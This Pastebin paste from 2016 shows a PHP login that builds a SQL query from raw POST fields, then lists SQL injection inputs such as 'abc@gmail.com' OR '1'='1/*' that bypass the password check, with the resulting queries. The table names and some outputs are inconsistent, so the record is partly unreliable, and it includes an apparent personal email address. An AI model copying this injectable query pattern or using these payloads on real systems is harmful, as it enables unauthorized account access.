Advertisement
Guest User

Untitled

a guest
Jul 8th, 2016
133
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.93 KB | None | 0 0
  1. $email = $_POST['u_email'];
  2. $password = $_POST['u_password'];
  3.  
  4. $query = "SELECT * FROM User WHERE EMAIL='$email' AND PASSWORD='$password'";
  5. $result = $mysqli->query($query);
  6. $counter = mysqli_num_rows($result);
  7.  
  8. echo "Counter: " . $counter . '<br>';
  9. echo "Query: " . $query;
  10. if($counter == 1)//Correct Login
  11.  
  12. Input
  13. Username: abc@gmail.com' OR '1'='1/*
  14. Password: */
  15.  
  16. Output
  17. Counter: 1
  18. Query: SELECT * FROM Usuario WHERE EMAIL='abc@gmail.com' OR '1'='1/*' AND PASSWORD='*/'
  19.  
  20. SELECT * FROM Usuario WHERE EMAIL='aa115@ikasle.ehu.es' OR '1'='1'
  21.  
  22. Input
  23. Username: xxx' OR '1'='1/*
  24. Password: */
  25.  
  26. Output
  27. Counter: 0
  28. Query: SELECT * FROM Usuario WHERE EMAIL='xxx' OR '1'='1/*' AND PASSWORD='*/'
  29.  
  30. SELECT * FROM Usuario WHERE EMAIL='xxx' OR '1'='1'
  31.  
  32. Input
  33. Username: abc@gmail.com/*
  34. Password: */
  35.  
  36. Output
  37. Counter: 0
  38. Query: SELECT * FROM Usuario WHERE EMAIL='abc@gmail.com/*' AND PASSWORD='*/'
  39.  
  40. SELECT * FROM Usuario WHERE EMAIL='xxx' OR '1'='1'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement